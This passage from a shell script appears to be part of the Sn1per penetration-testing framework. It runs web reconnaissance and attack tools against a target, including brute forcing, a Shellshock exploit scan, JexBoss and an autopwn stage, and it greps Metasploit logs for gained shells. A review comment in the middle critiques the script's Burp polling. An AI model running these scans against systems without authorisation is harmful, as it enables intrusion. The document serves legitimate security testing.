if [[ "$WEB_BRUTE_COMMONSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-common.txt
fi
fi
if [[ "$WEB_BRUTE_FULLSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-full.txt
fi
fi
if [[ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-exploits.txt
fi
fi
if [[ "$DIRSEARCH" == "1" ]]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
fi
fi
if [[ "$GOBUSTER" == "1" ]]; then
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET:${PORT}/robots.txt -O $LOOT_DIR/web/robots-$TARGET:${PORT}-http.txt 2> /dev/null
if [[ "$CLUSTERD" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
clusterd -i $TARGET -p ${PORT} | tee $LOOT_DIR/web/clusterd-$TARGET-port${PORT}.txt
fi
if [[ "$CMSMAP" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cmsmap http://$TARGET:${PORT} | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}a.txt
echo ""
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}b.txt
echo ""
fi
if [[ "$WPSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$WP_API_KEY" ]]; then
wpscan --url http://$TARGET:${PORT} --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.raw
echo ""
wpscan --url http://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.raw
echo ""
else
wpscan --url http://$TARGET:${PORT} --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.raw
echo ""
wpscan --url http://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.raw
fi
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}a.txt
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port${PORT}b.txt
rm -f $LOOT_DIR/web/wpscan-$TARGET-http*.raw 2> /dev/null
fi
if [[ "$NIKTO" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nikto -h http://$TARGET:${PORT} -output $LOOT_DIR/web/nikto-$TARGET-http-port${PORT}.txt
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port${PORT}.txt
fi
cd $INSTALL_DIR
if [[ "$CLUSTERD" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
clusterd -i $TARGET -p ${PORT} 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http-port${PORT}.txt
fi
if [[ "$SHOCKER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port ${PORT} | tee $LOOT_DIR/web/shocker-$TARGET-port${PORT}.txt
fi
if [[ "$JEXBOSS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd /tmp/
python3 /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET:${PORT} | tee $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw > $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw 2> /dev/null
cd $INSTALL_DIR
fi
if [[ "$SMUGGLER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u http://$TARGET:${PORT} | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt
fi
if [[ "$NUCLEI" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NUCLEI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nuclei -silent -t /root/nuclei-templates/ -c $THREADS -target http://$TARGET:${PORT} -o $LOOT_DIR/web/nuclei-http-${TARGET}-port${PORT}.txt
fi
SSL="false"
source $INSTALL_DIR/modes/web_autopwn.sh
source $INSTALL_DIR/modes/osint_stage_2.sh
fi
if [[ "$BURP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}"
echo ""
for a in {1..30};
do
echo -n "[-] SCAN #$a: "
curl -sI "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | grep HTTP | awk '{print $2}'
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
while [[ ${#BURP_STATUS} -gt "5" ]];
do
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
BURP_STATUS_FULL=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3)
echo "[i] STATUS: $BURP_STATUS_FULL"
sleep 15
done
done
echo "[+] VULNERABILITIES: "
echo "----------------------------------------------------------------"
for a in {1..30};
do
curl -s "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | jq '.issue_events[].issue | "[" + .severity + "] " + .name + " - " + .origin + .path' | sort -u | sed 's/\"//g' | tee $LOOT_DIR/web/burpsuite-$TARGET-$a.txt
done
echo "[-] Done!"
fi
if [[ "$ZAP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING OWASP ZAP SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[i] Scanning: http://$TARGET:$PORT/"
sudo python3 /usr/share/sniper/bin/zap-scan.py "http://$TARGET:$PORT/"
DATE=$(date +"%Y%m%d%H%M")
sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html
cp -f $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-http.html 2> /dev/null
echo "[i] Scan complete."
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html"
fi
if [[ "$ARACHNI_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ARACHNI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
DATE=$(date +"%Y%m%d%H%M")
mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives http://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
unzip arachni.zip
cd $INSTALL_DIR
fi
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
SSL="false"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
source $file
done
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
fi
source $INSTALL_DIR/modes/sc0pe.sh
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
if [[ ${#VULNERABLE_METASPLOIT} -ge 5 ]]; then
echo "$VULNERABLE_METASPLOIT" > $LOOT_DIR/output/vulnerable-metasploit-$TARGET.txt 2> /dev/null
fi
VULNERABLE_SHELLSHOCK=$(egrep -h -i -s "The following URLs appear to be exploitable:" $LOOT_DIR/web/shocker-$TARGET-*.txt 2> /dev/null)
if [[ ${#VULNERABLE_SHELLSHOCK} -ge 5 ]]; then
echo "$VULNERABLE_SHELLSHOCK" > $LOOT_DIR/output/vulnerable-shellshock-$TARGET.txt 2> /dev/null
fi
SHELLED=$(egrep -h -i -s "Meterpreter session|Command executed|File(s) found:|Command Stager progress|File uploaded|Command shell session" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
if [[ ${#SHELLED} -ge 5 ]]; then
echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi
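Review bot: the Burp Suite block polls scan task IDs 1 through 30 (`for a in {1..30}`) and afterwards dumps issues for the same fixed range, instead of using the task ID that `POST /v0.1/scan` returns in its `Location` response header, so on a Burp instance that has already run other scans the loop waits on and reports someone else's tasks, and on a fresh instance it polls 29 tasks that do not exist. Capture the header once, e.g. `TASK_ID=$(curl -si -X POST -H 'Content-Type: application/json' "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "$BODY" | grep -i '^Location:' | awk '{print $2}' | tr -d '\r')`, and poll and report only that task; the current `curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":...` also sends the JSON body without a JSON `Content-Type`. Two smaller points: the ZAP block writes its report to the fixed path `/usr/share/sniper/bin/zap-report.txt` under `sudo`, so concurrent tasks (the script keeps a `tasks-running.txt` count, so concurrency is expected) overwrite each other's report before it is copied into `$LOOT_DIR`; write it per target and date instead. And `nuclei -silent -t /root/nuclei-templates/` hard-codes root's home directory while the rest of the file resolves tools and templates through `$INSTALL_DIR` and `$PLUGINS_DIR`.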

462
modes/webporthttps.sh Normal file

@@ -0,0 +1,462 @@
# WEBPORTHTTPS MODE #####################################################################################################
if [[ "$MODE" = "webporthttps" ]]; then
if [[ "$REPORT" = "1" ]]; then
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[https://sn1persecurity.com"
echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
echo -e ""
echo -e ""
echo -e " ; , "
echo -e " ,; '. "
echo -e " ;: :; "
echo -e " :: :: "
echo -e " :: :: "
echo -e " ': : "
echo -e " :. : "
echo -e " ;' :: :: ' "
echo -e " .' '; ;' '. "
echo -e " :: :; ;: :: "
echo -e " ; :;. ,;: :: "
echo -e " :; :;: ,;\" :: "
echo -e " ::. ':; ..,.; ;:' ,.;: "
echo -e " \"'\"... '::,::::: ;: .;.;\"\"' "
echo -e " '\"\"\"....;:::::;,;.;\"\"\" "
echo -e " .:::.....'\"':::::::'\",...;::::;. "
echo -e " ;:' '\"\"'\"\";.,;:::::;.'\"\"\"\"\"\" ':; "
echo -e " ::' ;::;:::;::.. :; "
echo -e " :: ,;:::::::::::;:.. :: "
echo -e " ;' ,;;:;::::::::::::::;\";.. ':."
echo -e " :: ;:\" ::::::\"\"\"':::::: \": ::"
echo -e " :. :: ::::::; ::::::: : ; "
echo -e " ; :: ::::::: ::::::: : ; "
echo -e " ' :: ::::::....:::::' ,: ' "
echo -e " ' :: :::::::::::::\" :: "
echo -e " :: ':::::::::\"' :: "
echo -e " ': \"\"\"\"\"\"\"' :: "
echo -e " :: ;: "
echo -e " ':; ;:\" "
echo -e " -hrr- '; ,;' "
echo -e " \"' '\" "
echo -e " ''''$RESET"
echo ""
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
port_https=$PORT
if [[ -z "$port_https" ]];
then
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port $PORT opened... running tests...$RESET"
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s -R --insecure https://$TARGET:$PORT | tee $LOOT_DIR/web/headers-https-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s -R -L --insecure https://$TARGET:$PORT | tee $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 10 -I -s -R --insecure -X OPTIONS https://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
if [[ "$WEBTECH" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
webtech -u https://$TARGET:$PORT | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https-port$PORT.txt
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-https-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-https-$TARGET-$PORT.txt 2> /dev/null
if [[ "$WAFWOOF" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https-port443.txt 2> /dev/null
echo ""
fi
if [[ "$WHATWEB" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
whatweb -a 3 https://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw > $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw 2> /dev/null
echo ""
fi
if [[ "$WIG" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/wig/wig.py -d -q https://$TARGET:$PORT | tee $LOOT_DIR/web/wig-$TARGET-https-$PORT
